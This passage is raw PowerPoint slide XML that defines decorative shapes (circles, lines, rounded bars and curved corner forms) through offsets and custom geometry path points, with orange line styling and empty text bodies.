            <a:off x="981075" y="19050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2" name="AutoShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="2152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3" name="AutoShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2152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4" name="Freeform 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="215265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5" name="AutoShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="2152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6" name="AutoShape 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="24003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7" name="AutoShape 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="24003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8" name="Freeform 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="240030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9" name="AutoShape 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="24003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0" name="Freeform 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="2647950"/>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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33337" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56911" y="48767"/>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1" name="Freeform 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="2647950"/>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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33337" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56911" y="48767"/>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2" name="Freeform 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="2647950"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17450" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="48767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17450" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="48767"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="2250"/>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3" name="Freeform 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="2647950"/>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7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20359" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33337" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46315" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56911" y="48767"/>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4" name="AutoShape 24"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="28479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5" name="AutoShape 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="28479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6" name="Freeform 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="2847975"/>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AutoShape 27"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="28479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8" name="AutoShape 28"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="30956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1143000" y="30956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0" name="Freeform 30"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3095625"/>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1" name="AutoShape 31"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="30956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2" name="AutoShape 32"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="33432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1143000" y="33432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4" name="Freeform 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3343275"/>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5" name="AutoShape 35"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="33432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6" name="Freeform 36"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647700" y="3590925"/>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7" name="Freeform 37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143000" y="3590925"/>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8" name="Freeform 38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819150" y="3590925"/>
            <a:ext cx="57150" cy="57150"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="57150" h="57150">
                <a:moveTo>
                  <a:pt x="28575" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="17450" y="2250"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2244" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8367" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17450" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="28575" y="57150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="54899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="48768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="39683"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57150" y="28575"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="54905" y="17466"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="48782" y="8382"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39699" y="2250"/>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9" name="Freeform 39"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="981075" y="3590925"/>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0" name="Freeform 40"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="5434076"/>
            <a:ext cx="1595755" cy="1424305"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1595755" h="1424304">
                <a:moveTo>
                  <a:pt x="0" y="68764"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="74873" y="44755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="119524" y="33095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164835" y="23131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="210772" y="14899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="257297" y="8434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="304375" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351971" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="400050" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="448128" y="949"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="495724" y="3772"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="542803" y="8434"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="589329" y="14899"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635266" y="23131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="680579" y="33095"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725231" y="44755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="769187" y="58074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="812412" y="73018"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854869" y="89551"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="896523" y="107637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="937338" y="127241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="977279" y="148326"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1016309" y="170857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1054393" y="194798"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1091495" y="220114"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1127580" y="246768"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1162612" y="274726"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1196555" y="303951"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1229373" y="334408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1261030" y="366062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1291492" y="398875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1320722" y="432813"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1348684" y="467840"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1375343" y="503921"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1400664" y="541019"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1424609" y="579099"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1447144" y="618125"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1468233" y="658061"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1487840" y="698872"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1505930" y="740523"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1522466" y="782977"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1537413" y="826198"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1550736" y="870152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1562398" y="914802"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1572364" y="960112"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580598" y="1006047"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587064" y="1052572"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591727" y="1099650"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594551" y="1147246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1595501" y="1195324"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1594551" y="1243402"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1591727" y="1290998"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1587064" y="1338076"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1580598" y="1384601"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1573550" y="1423921"/>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41" name="Freeform 41"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697382" y="5293105"/>
            <a:ext cx="439420" cy="388620"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="439419" h="388620">
                <a:moveTo>
                  <a:pt x="233273" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="373849"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="438924" y="388023"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="233273"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42" name="Freeform 42"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="5848350"/>
            <a:ext cx="409575" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409575" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F58830">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="43" name="Freeform 43"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="5991225"/>
            <a:ext cx="409575" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="47625">
                <a:moveTo>
                  <a:pt x="385762" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23812" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409575" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762"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4" name="Freeform 44"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6181725"/>
            <a:ext cx="409575" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409575" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F58830">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Freeform 45"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6324600"/>
            <a:ext cx="409575" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="47625">
                <a:moveTo>
                  <a:pt x="385762" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23812" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409575" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762"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6" name="Freeform 46"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6515100"/>
            <a:ext cx="409575" cy="19050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="19050">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="409575" y="0"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="38100">
            <a:solidFill>
              <a:srgbClr val="F58830">
                <a:alpha val="100000"/>
              </a:srgbClr>
            </a:solidFill>
            <a:prstDash val="solid"/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" rtlCol="0" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Freeform 47"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219075" y="6657975"/>
            <a:ext cx="409575" cy="47625"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="409575" h="47625">
                <a:moveTo>
                  <a:pt x="385762" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="23812" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1870" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6972" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14541" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23812" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762" y="47625"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="45754"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="40652"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="33083"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="409575" y="23812"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="407704" y="14541"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="402602" y="6972"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="395033" y="1870"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385762"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8" name="Freeform 48"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10839450" y="5362575"/>
            <a:ext cx="1352550" cy="1495425"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="1352550" h="1495425">
                <a:moveTo>
                  <a:pt x="1262126" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="1213710" y="914"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1165756" y="3637"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1118296" y="8134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1071362" y="14374"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1024988" y="22322"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="979206" y="31948"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="934048" y="43216"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="889548" y="56096"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="845738" y="70554"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="802650" y="86557"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="760317" y="104072"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718773" y="123068"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="678049" y="143510"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638179" y="165366"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="599195" y="188603"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="561129" y="213188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="524014" y="239089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="487884" y="266273"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="452771" y="294707"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="418706" y="324359"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="385724" y="355194"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="353856" y="387181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="323136" y="420287"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="293596" y="454479"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265269" y="489724"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="238187" y="525989"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212383" y="563242"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187890" y="601450"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164740" y="640580"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142967" y="680598"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122602" y="721473"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="103678" y="763172"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="86229" y="805661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="70287" y="848908"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="55883" y="892880"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="43052" y="937545"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31826" y="982869"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22238" y="1028819"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1075364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1122469"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1170103"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="911" y="1315416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3623" y="1363546"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8103" y="1411180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14319" y="1458285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20637" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="537225" y="1495422"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1455015"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1409344"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1362696"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1315160"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502539" y="1266825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="504033" y="1218489"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="508457" y="1170953"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="515722" y="1124305"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="525739" y="1078634"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="538418" y="1034032"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="553671" y="990586"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="571408" y="948387"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="591541" y="907524"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="613981" y="868087"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="638639" y="830164"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665425" y="793847"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="694250" y="759224"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="725027" y="726384"/>
                </a:lnTo>
                <a:lnTo>
